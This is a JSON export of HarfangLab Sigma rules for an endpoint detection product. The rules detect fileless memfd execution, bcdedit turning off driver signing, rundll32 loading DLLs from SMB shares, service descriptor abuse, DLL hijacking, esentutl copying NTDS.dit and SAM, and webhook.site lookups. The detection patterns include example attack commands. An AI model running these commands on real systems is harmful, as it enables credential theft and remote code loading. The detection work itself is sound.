"rule_level_override": null,
"rule_id": "84e95c4d-07d4-49bc-90f2-6545f7ef9b88",
"rule_name": "Fileless Process Execution via Memfd",
"rule_description": "Detects the execution of a process with an anonymous image file created via \"memfd_create()\".\nThe \"memfd_create()\" syscall creates an anonymous file that lives in RAM and has a volatile backing storage.\nOnce all references to the file are dropped, it is automatically released.\nThis method, called fileless execution, is typically used by malware to avoid signature-based detection from common security tools.\nIt is recommended to ensure that both the process and its parent had a legitimate reason to do so and that the host wasn't compromised.\n",
"rule_creation_date": "2024-11-18",
"rule_modified_date": "2025-11-07",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8539d06a-adc8-4186-8389-94ced1b1912e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070775Z",
"creation_date": "2026-03-23T11:45:34.070778Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set",
"https://attack.mitre.org/techniques/T1562/"
],
"name": "t1562_004_disable_driver_signature_check_bcdedit.yml",
"content": "title: Driver Signature Check Setting Altered via bcdedit\nid: 8539d06a-adc8-4186-8389-94ced1b1912e\ndescription: |\n Detects when the driver signature check is disabled using bcdedit.\n Attackers may disable driver signature check or enable test signing in order to load unsigned malicious drivers.\n It is recommended to check if this action is expected on this machine, and to investigate if any unsigned drivers have been loaded after this action.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option\n - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\n - https://attack.mitre.org/techniques/T1562/\ndate: 2022/04/12\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562\n - attack.t1553\n - attack.t1553.002\n - attack.t1553.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\n\ndetection:\n selection_bcdedit:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n\n selection_set:\n CommandLine|contains:\n - '/set'\n - '-set'\n\n selection_set_testsigning:\n CommandLine|contains|all:\n - 'testsigning'\n - ' on'\n\n selection_set_loadoptions:\n CommandLine|contains|all:\n - 'loadoptions'\n - 'DISABLE_INTEGRITY_CHECKS'\n\n selection_set_integrity:\n CommandLine|contains|all:\n - 'nointegritychecks'\n - ' on'\n\n condition: selection_bcdedit and selection_set and 1 of selection_set_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8539d06a-adc8-4186-8389-94ced1b1912e",
"rule_name": "Driver Signature Check Setting Altered via bcdedit",
"rule_description": "Detects when the driver signature check is disabled using bcdedit.\nAttackers may disable driver signature check or enable test signing in order to load unsigned malicious drivers.\nIt is recommended to check if this action is expected on this machine, and to investigate if any unsigned drivers have been loaded after this action.\n",
"rule_creation_date": "2022-04-12",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553",
"attack.t1553.002",
"attack.t1553.006",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8551ce78-7ac5-492b-96e4-b91d4ec83477",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070331Z",
"creation_date": "2026-03-23T11:45:34.070333Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070337Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Rundll32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_load_dll_smb.yml",
"content": "title: Suspicious DLL Loaded from SMB Share\nid: 8551ce78-7ac5-492b-96e4-b91d4ec83477\ndescription: |\n Detects a suspicious loading of DLL from an SMB Share by rundll32.\n Attackers can use this technique to evade detection.\n It is recommended to investigate the loaded DLL and the parent process for suspicious activities.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/11/03\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe \\\\10.10.10.10\\share\\payload.dll,EntryPoint\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_2:\n CommandLine|contains: ' \\\\\\\\*\\'\n\n filter_smb_share_arg:\n CommandLine|contains: ' ?:\\\\*,* \\\\\\\\*\\'\n\n exclusion_cmd:\n CommandLine|contains:\n - 'printui.dll?PrintUIEntry'\n - 'printui.dll, PrintUIEntry '\n - 'printui,PrintUIEntry '\n - 'printui.dll , PrintUIEntry '\n - 'rundll32.exe ?:\\Windows\\System32\\mshtml.dll,PrintHTML'\n - ' ?:\\Windows\\system32\\shell32.dll,OpenAs_RunDLL '\n - ' ?:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll,PhotoAndVideoAcquire '\n - ' ?:\\WINDOWS\\system32\\spool\\DRIVERS\\\\*\\3\\hp*,MonitorPrintJobStatus /pjob='\n - ' ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\hp*.dll,CheckDevice /pname'\n - ' ?:\\windows\\system32\\dsquery.dll,OpenSavedDsQuery '\n - 'rundll32 url,FileProtocolHandler '\n # rundll32.exe C:\\\\windows\\\\system32\\\\newdev.dll,pDiDeviceInstallNotification \\\\\\\\.\\\\pipe\\\\PNP_Device_Install_Pipe_1.{93b03590-a1d5-469b-8258-bb3ccd6f4c44} (null)\n # rundll32.exe C:\\\\Windows\\\\system32\\\\hotplug.dll,HotPlugSafeRemovalNotification \\\\\\\\.\\\\pipe\\\\PNP_HotPlug_Pipe_1.{c8a2ee35-7f69-46a5-a06c-aee47a969b35}\n - '\\Windows\\system32\\\\*\\\\\\\\.\\pipe\\'\n # C:\\WINDOWS\\system32\\rundll32.exe fdprint,InvokeTask /ss \\\\?\\USB#VID_04F9&PID_03B7&MI_01#6&13fbb565&0&0001#{6bdd1fc6-810f-11d0-bec7-08002be2092f}\n - 'rundll32.exe fdprint,InvokeTask /ss'\n - 'rundll32.exe cryptext.dll,CryptExt' # CryptExtOpenCER / CryptExtAddPFX / CryptExtOpenPKCS7\n - '?:\\windows\\system32\\rundll32.exe ?:\\windows\\system32\\cryptext.dll,'\n - '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\cnmsm??.dll,StatusMonitorEntryPoint'\n - 'rundll32 ?:\\windows\\system32\\spool\\DRIVERS\\\\*\\3\\ssnetmon.d64,StatusMonitor '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll'\n - 'rundll32.exe ?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\NalShell.dll,NalExplorerExecuteShortcut '\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\FirewallControlPanel.dll,ShowNotificationDialog '\n - 'rundll32.exe url.dll,FileProtocolHandler '\n - 'rundll32 url.dll,FileProtocolHandler '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\dfshim.dll,ShOpenVerbApplication '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\dfshim.dll,ShOpenVerbShortcut '\n - 'rundll32.exe dfshim.dll,ShOpenVerbApplication '\n - 'rundll32.exe ?:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll,InstallVstoSolution '\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll*ImageView_Fullscreen'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\shimgvw.dll'\n - 'rundll32.exe ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files\\CopyTrans HEIC for Windows\\CopyTransHEICforWindows.dll'\n - 'RUNDLL32.EXE ?:\\program files (x86)\\hp\\digital imaging\\bin\\hpslpsvc64.dll'\n - '?:\\windows\\system32\\rundll32.exe fdprint,InvokeTask'\n - '?:\\Windows\\System32\\rundll32.exe shell32.dll,OpenAs_RunDLL'\n - 'rundll32 SHELL32.dll,ShellExec_RunDLL'\n\n exclusion_tsworkspace:\n CommandLine|startswith: '?:\\Windows\\system32\\rundll32.exe tsworkspace,WorkspaceSilentSetup'\n\n exclusion_distant_epson:\n CommandLine|startswith:\n - 'rundll32.exe *\\Epson DS-530\\\\*\\E_UPWJ??.DLL,EPGetVersionEx /LOG:?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON'\n - 'rundll32.exe *\\Scanner Epson DS-530\\\\*\\E_UPWJ??.DLL,EPGetVersionEx /LOG:?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON'\n\n exclusion_ibm:\n CommandLine|startswith: 'rundll32.exe *\\IBMi - ACS and Co\\IBMiAccess_v1r1\\Start_Programs\\Windows_x86-64\\acsnative.dll, LunarModule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8551ce78-7ac5-492b-96e4-b91d4ec83477",
"rule_name": "Suspicious DLL Loaded from SMB Share",
"rule_description": "Detects a suspicious loading of DLL from an SMB Share by rundll32.\nAttackers can use this technique to evade detection.\nIt is recommended to investigate the loaded DLL and the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8561d1d1-ea2a-4b93-a802-bdc392662355",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072162Z",
"creation_date": "2026-03-23T11:45:34.072164Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072168Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0xv1n.github.io/posts/scmanager/",
"https://pentestlab.blog/2023/03/20/persistence-service-control-manager/",
"https://attack.mitre.org/techniques/T1543/003/",
"https://lolbas-project.github.io/lolbas/Binaries/Sc/"
],
"name": "t1543_003_scmanager_security_descriptor_persistence.yml",
"content": "title: Suspicious Service's Security Descriptor Modification\nid: 8561d1d1-ea2a-4b93-a802-bdc392662355\ndescription: |\n Detects a suspicious modification of a service's security descriptor to allow unprivileged users to interact with this service.\n For example, adversaries can make this change on the service-control manager service (scmanager) to be able to create malicious services that will run under the SYSTEM privileges even with a non admin account.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://0xv1n.github.io/posts/scmanager/\n - https://pentestlab.blog/2023/03/20/persistence-service-control-manager/\n - https://attack.mitre.org/techniques/T1543/003/\n - https://lolbas-project.github.io/lolbas/Binaries/Sc/\ndate: 2023/08/24\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains|all:\n - ' sdset '\n - ' D:(A;;KA;;;WD)'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8561d1d1-ea2a-4b93-a802-bdc392662355",
"rule_name": "Suspicious Service's Security Descriptor Modification",
"rule_description": "Detects a suspicious modification of a service's security descriptor to allow unprivileged users to interact with this service.\nFor example, adversaries can make this change on the service-control manager service (scmanager) to be able to create malicious services that will run under the SYSTEM privileges even with a non admin account.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2023-08-24",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "85976596-5ef3-4f79-a56a-43f6e25c2aee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594180Z",
"creation_date": "2026-03-23T11:45:34.594183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594191Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_unlodctr.yml",
"content": "title: DLL Hijacking via unlodctr.exe\nid: 85976596-5ef3-4f79-a56a-43f6e25c2aee\ndescription: |\n Detects potential Windows DLL Hijacking via unlodctr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'unlodctr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\loadperf.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "85976596-5ef3-4f79-a56a-43f6e25c2aee",
"rule_name": "DLL Hijacking via unlodctr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via unlodctr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "85ff5382-3f31-48c8-baa5-9421a4b720be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082285Z",
"creation_date": "2026-03-23T11:45:34.082287Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082292Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsreset.yml",
"content": "title: DLL Hijacking via wsreset.exe\nid: 85ff5382-3f31-48c8-baa5-9421a4b720be\ndescription: |\n Detects potential Windows DLL Hijacking via wsreset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsreset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\licensemanagerapi.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "85ff5382-3f31-48c8-baa5-9421a4b720be",
"rule_name": "DLL Hijacking via wsreset.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsreset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8610a64e-eb0f-436c-b21d-33f757ea41f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074625Z",
"creation_date": "2026-03-23T11:45:34.074627Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074632Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Esentutl/",
"https://attack.mitre.org/techniques/T1003/003/",
"https://attack.mitre.org/software/S0404/"
],
"name": "t1003_003_copying_sensitive_files_with_esentutl.yml",
"content": "title: Sensitive Files Copied via esentutl.exe\nid: 8610a64e-eb0f-436c-b21d-33f757ea41f0\ndescription: |\n Detects the execution of the legitimate esentutl.exe Windows binary, a command-line tool that provides database utilities for the Windows Extensible Storage Engine.\n This binary can be used as a LOLBin in order to copy sensitive files (e.g NTDS.dit, SAM) from Volume Shadow Copies.\n It is recommended to analyze the process responsible for the execution of esentutl.exe, as well as to investigate files that were copied from the VSS and identify possibly stolen credentials or sensitive material.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Esentutl/\n - https://attack.mitre.org/techniques/T1003/003/\n - https://attack.mitre.org/software/S0404/\ndate: 2021/08/24\nmodified: 2025/09/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.defense_evasion\n - attack.t1006\n - attack.s0404\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\esentutl.exe'\n - OriginalFileName: 'esentutl.exe'\n selection_2:\n # esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d c:\\folder\\ntds.dit\n # esentutl.exe /y /vss c:\\Windows\\system32\\config\\SAM /d c:\\folder\\SAM\n CommandLine|contains|all:\n - ' /y '\n - ' /vss '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8610a64e-eb0f-436c-b21d-33f757ea41f0",
"rule_name": "Sensitive Files Copied via esentutl.exe",
"rule_description": "Detects the execution of the legitimate esentutl.exe Windows binary, a command-line tool that provides database utilities for the Windows Extensible Storage Engine.\nThis binary can be used as a LOLBin in order to copy sensitive files (e.g NTDS.dit, SAM) from Volume Shadow Copies.\nIt is recommended to analyze the process responsible for the execution of esentutl.exe, as well as to investigate files that were copied from the VSS and identify possibly stolen credentials or sensitive material.\n",
"rule_creation_date": "2021-08-24",
"rule_modified_date": "2025-09-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86213fd2-3e42-47e8-b6ae-b6ab6da0c1ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625263Z",
"creation_date": "2026-03-23T11:45:34.625265Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625269Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1567_webhook_dns_request.yml",
"content": "title: DNS Resolution of a Webhook Service\nid: 86213fd2-3e42-47e8-b6ae-b6ab6da0c1ea\ndescription: |\n Detects a DNS resolution request of a webhook service such as webhook.site.\n These services allow for automatic logging of the requests they receive and can be configured to reply custom responses.\n Attackers can use such services to exfiltrate stolen data stealthfully, or to host and deliver malicious payloads.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/09/07\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName: 'webhook.site'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n filter_opera:\n ProcessDescription: 'Opera Internet Browser'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n 